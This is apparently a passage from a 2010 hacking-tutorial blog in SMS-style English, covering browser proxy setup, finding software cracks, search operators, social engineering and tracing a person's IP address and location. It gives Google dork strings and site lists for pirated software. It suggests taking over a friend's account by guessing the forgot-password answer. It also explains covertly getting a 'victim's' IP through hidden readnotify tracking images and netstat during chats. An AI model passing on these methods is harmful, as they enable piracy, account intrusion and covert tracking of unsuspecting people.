2. Under Proxy server, click to select the Use a proxy server for your LAN check box.
3. In the Address box, type the IP address of the proxy server.
4. In the Port box, type the port number that is used by the proxy server for client connections (by default, 8080).
5. You can click to select the Bypass proxy server for local addresses check box if you do not want the proxy server computer to be used when you connect to a computer on the local network (this may speed up performance).
6. Click OK to close the LAN Settings dialog box.
7. Click OK again to close the Internet Options dialog box.



Instructions for FireFox
==================

1. Select the Tools Menu
2. Select Options
3. Select Connection Settings
4. Select Manual Proxy Configuration
5. Check Use the same proxy for all protocols
6. Enter the IP address for the HTTP proxy server
7. Enter the port of the HTTP proxy server
8. Click Okay


Instructions for Netscape 7.1
=====================

1. Select the Edit Menu
2. Select Preferences
3. Maximize Advanced
4. Select Proxies
5. Choose Manual proxy configuration
6. Enter the proxy server's IP address in the HTTP Proxy field and the proxy's port into the corresponding Port field.
7. OK your way out

Opera 8.5
========

1. Select the Tools Menu
2. Select Preferences
3. Select Advanced Tab
4. Select Proxy Servers
5. Check the box next to HTTP
6. Enter the proxy server's IP address in the first box and the proxy's port in the box after "Port"
7. OK your way out

Safari 2.0.3
=========

1. Select Preferences
2. Select Advanced
3. Select Proxies: Change Settings
4. Check the box next to Web Proxy (HTTP)
5. Enter the proxy server's IP address in the first box and the proxy's port in the box after the ":"
6. Select Apply Now


Hope u like it

===========
Comments are welcome
==================
 
 
۩ ۩..яєℓคтє∂ тσթเcร..۩ ۩
╚►Chapter 9 : Hack into Someone's PC using Keylogger
╚►Chapter 8 : Phishing ( The fake page )               
╚►Chapter 7 : Changing the ip address and bypassing the firewall
╚►Chapter 6 : Softwares and Cracking
╚►Chapter 5 : SEARCH ENGINE OPTIMIZATION
╚►Chapter 4 : Social Engineering
╚►Chapter 3 : Tracing IP address & Location of Person...
╚►Chapter 2 : EXPLOITING IP ADDRESS.
╚►Chapter 1 : A bit about Hackerz
╚►Chapter 0 : Introduction to Hacking
 
Well,this chapter may seem some funny in starting bt bcoz d course has been started vd 100% basics there4 itis very much essential 2 describe it.
anyway,
softwares r nothing else but complicated programmes written in many laungugaes nd in assembly laungugage,softwares just tells 2 ur hardware nd 2 oder softwares 2 follow a specific work,today in dis modern arena there r milion of softwares available,
some of dem r freeware nd some of dem r shareware.
a freeware software is a free of cost software,u may get any freeware software on download.con,filehippo.com
bt most of d softwares need money 2 work on ur computer,in dis era 4 a specific work der r many softwares der4 all d companies who makes softwares givesu a demo version of a software,demo version comes 4 free,suppose dt ider is a software vch cost is 99$ then u can get this software 4 free also bt in dt case u vl get only demo version,demo version does nt contain itself all d function of dt software nd demo version comes 4 15 days/30 days,after of dt u cann't use dt software again.
u cann't imagine a comuter vdout software.
till here we talked only about leegalthings.
let's moov 2 cracks,crac/patching exe/working serial r provided 2 u by hackers .if a software needs money then in dt case byapplying its crack u may use dt software 4 free,bt this is really nt leegal bt in dis modern era many ppl r doing this there4 de webmaster ignore this crack thing.

now,der r some softwares vch crack u can not search.
actualy,after installing dese softwares de software need 2 connect vd internet nd then at d server of dt software maker comapny they wathc,that u hv bought this software or it is crack,but this thing is only vd very few softwares.
in dis modern era a person upload d software's crack on a website nd then other ppl download it.some person also upload cracks on torrents,torrents can be downloaded by using torrent downloader ,a good torrent downloader is "bit torrent"u can get bittorrent on download.com

as i previously told u dt a cracker is a person who only searchs tricks on internet ,nw if u can search softwares crack on internet easily then u can say ursekf a cracker,u vl be awarded vd d name of a cracker if u can search softwares crack on internet,
see,in dis modernm era nearly all d softwares r uploaded on rapidshare .com or on torrents.
whoever upload,generally he gives its link on his forum or blogspot
der4 nowwards wenever u vl be needing any software's crack,all u need is to search 4 d below string nd u vl get ur desired software.
inurl:forum intext:rapidshare intext:software's name
hit enter nd u vl get ur software very easily.
4 searching on torrents use dis
inurl:torrent intext:software' name




Relevant sites :
===========

U CAN ALSO SEARCH SOFTWARES ON DESE SITES
IF U VANT 2 rapidshare links then go on
rapidsharesearchengine.com,filez.com
nd 4 searching on torrents go on these sites
www.torrentz.com, www.torrentreactor.com, torrents.to
enjoi freinds .now u can say urself a successfull cracker.
cheers.
see,seo vl give u d exact result ,this is nt necessary,SEO just increases d chances of getting something easily.
somtimes SEO does nt give a proper result.nvr mind dt.
4 searching software's on rapidshare u may use dese sites
[1]www.filez.com/
[2]rapidlibrary.com/
[3]rapidshare-search-engine.com/
[4]www.filecrop.com/
[5]rapid.tvphp.net/
[6]www.rapidsharelink.com/
[7]www.rapidsearch.in/
[8]www.rapidshare1.com/

Comments are welcome
=================
 
 
۩ ۩..яєℓคтє∂ тσթเcร..۩ ۩
╚►Chapter 9 : Hack into Someone's PC using Keylogger
╚►Chapter 8 : Phishing ( The fake page )               
╚►Chapter 7 : Changing the ip address and bypassing the firewall
╚►Chapter 6 : Softwares and Cracking
╚►Chapter 5 : SEARCH ENGINE OPTIMIZATION
╚►Chapter 4 : Social Engineering
╚►Chapter 3 : Tracing IP address & Location of Person...
╚►Chapter 2 : EXPLOITING IP ADDRESS.
╚►Chapter 1 : A bit about Hackerz
╚►Chapter 0 : Introduction to Hacking
 

Monday, August 30, 2010

SEARCH ENGINE OPTIMIZATION
==========================

Nowwards we will moov 2 SEO[SEARCH ENGINE OPTIMIZATION],thenwards SOFTWARES ND CRACKING ,THEN WARDS PROXY ND THENWARDS HACKING IN 2 OTHER'S COMUTER.
THESE R D NEXTCHAPTERS.
LET'S START learning seo.
Well,SEO gives us d exact thing vch we want 2 get 4m google.suppose dt u r searching 4 something on google then google gives u more than 100000 pages nd it is very much difficult 2 find ur exact needed thing in a single shot.SEO gives u d exact thing vch u need exactly.let's start SEO
go here,
http://newyears.noo.com/noo/m/browse...wevent/id/518/
here u can see written dis line
"New Years Eve at Pink Elephant"
this is dCOLOR="RED"] "title"[/color] of dis web page
d link vch i posted above is d "url"
nd all d data vch has written der is "text"
now,suppose dt u vant 2 search anything on google nd u want 2 search 4 forum then simpally type
inurl:forum
i mean wenever u hv 2 search anything in url ,write
inurl:desired thing
wenever u hv 2 search in text write
intext:desired thing
wenever u hv 2 search anything in text write
intext:desired thing
well, i know most of u r knowing these things already bt d ppl who r nt knowing these,plz try 2 understand dis thing,vdout SEO,u ppl vl feel a lot of problem while hacking a website 4 sql injection,searching cracks on internet nd 4 deirectry transeversal ,it is very much essential thing
well,

Now do some practice vd d thing vch i wrote here

suppose dt u want 2 search d new year celebration then simpally write in google
intitle:new year celebration
if u vant 2 search any websit's login page then type
intext:login inurl:website address
nd search 4 .
now suppose dt u want 2 find anything in a specific website then use dis syntax
site:website fulll address d thing vch u want2 search in dt website
dis syntax is really very good.
NOW SUPPOSE DT U WANT 2 SEARCH ANY PDF TYPEFILE OR doc type file then simpally use dis syntax
filetype:pdf
d next thing in SEO IS
RELATED NAMED STUFF,u know dt yahoo is a search



D SUMMARY OF D CHAPTER

=========================

[1]4 searching something in url use"inurl:"
[2]4 srching in title use"intitle:"
[3]4 srhcing in text use "intext:"
[4]2 get a file of specific type use "filetype::
[5]2 restrct ur search in a website use "site:websiteaddress urdesired seacrhing item"
[6]2 get information about a website use"info:website full addres"
[7]2 get related type sites type"related:website ful address"
[8]2 nt appear a syntax in ur srch results use a minus[dash] sign.
to d person who r reading this type thing first time,i m requsting them 2 do very much practice vd all of dese syntaxes.
a good person always searches by dese techniques.u can find many books related on google ,i hv read all of dem nd thenwards i hv written all d results driven 4m dem.
do a hell of practice plz
 
 
۩ ۩..яєℓคтє∂ тσթเcร..۩ ۩
╚►Chapter 9 : Hack into Someone's PC using Keylogger
╚►Chapter 8 : Phishing ( The fake page )               
╚►Chapter 7 : Changing the ip address and bypassing the firewall
╚►Chapter 6 : Softwares and Cracking
╚►Chapter 5 : SEARCH ENGINE OPTIMIZATION
╚►Chapter 4 : Social Engineering
╚►Chapter 3 : Tracing IP address & Location of Person...
╚►Chapter 2 : EXPLOITING IP ADDRESS.
╚►Chapter 1 : A bit about Hackerz
╚►Chapter 0 : Introduction to Hacking
 
 
SOCIAL ENGINEERING
===================

Social enginering is a very small chapter,it is nt only related 2 internet arena bt it is also related 2 ur social nd general life.u do flirt vd a girl dt is social engineering.saying lies 2 some1 4 making ur own work succeed is also social engineering.social engineering is nothing else but 2 do some crooking vd some1 4 making ur own work completed.suppose dt der is some1 ur freind nd u want 2 hack his orkut ,then vdout trying 2 hack his password simpally click on forgot password,a general person generally put very comman question here vch is very easy 2 guess if u r his freind,social engineering is a very imp. thing.
let me tell u d first story of hacking.
it held thru social engineering.
in starting wen telephone ws new in d world then d first hacker of d world,just looked at d working method of telephonic service,he found dt wen we call some1 then our reqst goes 2 telephone office then there it originates a specific freequency then it transfer 2 d person 2 whom we r calling.he just made a tofee nd put a small whistle in dt packet of tofee vd saying it is a gift vd tofee.
ppl nd der children started whistling dt whistle,wenever any1 used dt wistle, it produced d same freequency as d telephone server freequncy nd this thing made dt hacker's calls free around d world.

just look at d whole incident,he just thought nd used a small whistle.
it means social engineering is very much imp.,if u r doing something big then vdout taking d help of social enginering u cann't make ur desired work.
suppose dt der is some1 ur freind nd u want 2 hack his orkut ,then vdout trying 2 hack his password simpally click on forgot password,a general person generally put very comman question here vch is very easy 2 guess if u r his freind,social engineering is a very imp. thing,bcoz he is ur freind den in forgot password.

STANDARD DEFINITION OF SOCIAL ENGINEERING

[1]social engineering is d human side of breaking in to a corporate network
companies3 d authentication processes,firewall,virtual private networks nd network monitoring softwares are still wide open 2 attackssocial engineering is d hardest form of attack to defend against bcoz it can't be defend vd hardware or software alone.
sometimes wen u open a website then u see der something written like"congrats' u r d 1lakhth visitor click here 2 claim"
on dese places everyday thousands of ppl give der credit cards information easily,
der r 2 types of social engineering
[first]HUMAN BASED SOCIAL ENGINEERING
IT IS CATEGORIZED IN 2 DESE PARTS
-->impersonation
--->posing as imp. user
--->3rd person approcah
--->technical support



COMPUTER BASED SOCIAL ENGINEERING


these r classified in dese
-->mail/im attachments
-->pop up windows
--->sweepstakes
--->spam mail
dis chapter is over now.
wen u vl do something big in ur future then while planning u vl understand d imporataince of social enginnering.
mind it,4 tracing some1 wen u send som1 a e mail or wen u say him 2 send a file or accept a file 4m him then these things r also social egineering.
we wiill be using this social engineering while sending some1 trojan/keylogger nd 4 many more things.these things vl come in dis course in future.




۩ ۩..яєℓคтє∂ тσթเcร..۩ ۩
╚►Chapter 9 : Hack into Someone's PC using Keylogger
╚►Chapter 8 : Phishing ( The fake page )               
╚►Chapter 7 : Changing the ip address and bypassing the firewall
╚►Chapter 6 : Softwares and Cracking
╚►Chapter 5 : SEARCH ENGINE OPTIMIZATION
╚►Chapter 4 : Social Engineering
╚►Chapter 3 : Tracing IP address & Location of Person...
╚►Chapter 2 : EXPLOITING IP ADDRESS.
╚►Chapter 1 : A bit about Hackerz
╚►Chapter 0 : Introduction to Hacking
 
In Chapter 2, we have seen the exploiting of ip address,now we move a little forward. Be with us and read it carefully.
TRACING A PERSON WHO HAS
==========================
SENT U AN E-MAIL :
================
Open ur mail box ,open any e mail.now click on reply .now click on show original.
view whole d data written der.now u may find dt person's ip address...in show original column u may find dt person ip address but if some1 has sent u mail 4m gmail.com then u cann't get his ip address 4m dis mehod.
actually gmail uses https[secured=s]
there4 u cann't get his id addres.
but there is an way 2 trace g mail also.wait i am writing.
now dis trick is 4 tracing gmail,yahoomail,hotmail nd 4 all mail services.
4m dis technique[vch i am going 2 write down]u can trace all email's ip address.
first of all open
readnotify.com
register der.
now wenever u vl be needing to trace any1 then compose a mail 2 him nd in email to section write
victim'semailid.rednotify.com
nd send him d mail.wen he vl read ur mail ,a mail 2 ur readnotify wil go automatically nd by opening ur readnotify account der u can see dt person' ip adderess.
actually readnotify sends an automatic generated image vd ur mail nd dis hidden image gives u victim's ip address.
dis technique is very good.

TRACING THE LOCATION :
=====================

NOW AFTER KNOWING THE IP ADDRESS OF A PERSON,We CAME A LITTLE FORWARD, FOR TRACING A PERSON 4 KNOWING WHERE HE IS,ND 4 KNOWING IN VCH COUNTRY IN VCH STATE ND IN VCH CITY HE IS?
JUST OPEN
http://www.ip2location.com/
here on dis website put d ip address of dt person nd u vl get 2 know his physical appearance.dis thing is also possible 4m telnet bt leave dt .dt is very complicated.

TRACING A PERSON VD WHOM U R CHATTING :
======================================

Well,if u r chatting vd a person then simpally ask his ip address if he tels then its ok. bt vat if he does nt tell?hehehe LOLZ
anyway
see,here r some cases.some different cases nd u must hv 2 do different operation vd different massengers.
wait i am writing.
well,in dis section first of all i ud like 2 remind u d working method of netsta -n command vch i wrote previously.
netstat command gives u d information of all the communication vch u r doing vd internet.i mean,suppose dt if u r connected 2 orkut nd g mail nd any porn site at a single instant then netstat tells u about all they 3 server's ip address.
this moment there r many massengers vch ppl use ,,,4 example--->icq massaneger,msn,yahoo massenger,g talk massenger nd many more ,ppl also use some sites like meebo.com 2 use masenger.
now der r some cases




-------------------->CASE [1]<------------------------
if u r chatting 2 some1 on icq massenger then here is d working method of icq massenger
you------>ur freind
ur freind---->you
well,this thing makes very easy 2 trace some1 while chating on icq massenger,wen u r chatting vd him then b4 of starting chatting just open run type cmd hite enter nd write
netstat -n
mind it ,till now u hv nt done started chatting vd him,now many ip address will come,simpally note down them somewhere,
now start chatting vd him,
nd while chatting vd him
again open run,type cmd hit enter nd type
netsta -n
now u vl see,a new id address.
bingo,now u hv got d ip address of ur freind
 

------------------->CASE [2]<----------------------

CHATTING ON YAHOO,MSN,G TALK MASSENGER
these massengers works in dis way,
you------->massenger's server------>ur freind
if u vl do d previous operation then u vl find massenger's ip addres.
here,u may use social eengineering,
social eenginering is d next chapter bt here a small introduction.
social eengineering mans making some1 fool nd hacking him,
in dis masenger case[mind it most of d massenger follow dis way]simpally say ur freind 2 send a file or 2 recieve a file,if he agrred then just do previous operation.
when he vl send u d file then it vl nt come thru massenger ,it vl directly come 2 u nd by writing netstat -n,u may find 1 more ip address dt is of ur freind.
or der's a 1 more method,u may say him 2 mail you or write a mail 2 him nd use readnotify thing,vch i told previously nd now wen he vl send u mail or wen he vl reply 4 ur mail,u can get his ip address.
confused



--------------------->CASE [3]<-------------------------

TRACING SOME1 WHILE CHATTING ON MEEBO.COM TYPE ONLINE MASSENGERS.
,
here's no method 2 trace him apart of saying him 2 send a mail 2 you or u may send him a mail nd wen he vl reply u vl get or u may say him 2send u a file.
dt's it.

well, tracing some1 is nt a big job nd u can do it very easy.

der r some more commands 2 find ur id address nd der r many more things about ip address,der r 4 different types of ip addresses,
der is subnet id nd hostid named things exits,u can open a website by writing dt ip address only in d url nd der r some hexatransFer,qustra transfer named things also exits but trust me de things r of no use.
u may get each nd every information abour ur ip address by doing dis
open run ->type cmd
write ipconfig/all
dis will tell u ur smtp,dhcp information nd many things,writing only ipconfig in command prompt vl also give u many information nd writing inconfig/series will also give bt netstat is fine.
only ipconfig/all is a good syntax 2 give u ur onw all informations
tracing ip address is completed now.
i m nt writing divisiond nd more useless stuffs about ip address,all d things i told previously r enough 4 ip address bt still if u ppl want 2 know more about ip address then write incomments,i vl tell u .i m waiting 4 u ppl reply der.
we,, we will moov back 2 d learn doing proxy[changing ur ip address] .
In next chapters u ppl vl learn cracking,social eenginering nd hacking in 2 other person's comuter .after of these 3 chapters we will study 2 do proxy.
be ready freinds,we r moving 2 hack now.

۩ ۩..яєℓคтє∂ тσթเcร..۩ ۩
╚►Chapter 9 : Hack into Someone's PC using Keylogger
╚►Chapter 8 : Phishing ( The fake page )               
╚►Chapter 7 : Changing the ip address and bypassing the firewall
╚►Chapter 6 : Softwares and Cracking
╚►Chapter 5 : SEARCH ENGINE OPTIMIZATION
╚►Chapter 4 : Social Engineering
╚►Chapter 3 : Tracing IP address & Location of Person...
╚►Chapter 2 : EXPLOITING IP ADDRESS.
╚►Chapter 1 : A bit about Hackerz
╚►Chapter 0 : Introduction to Hacking
                  -------------------------------------------------------------------------

0 Comments:

Post a Comment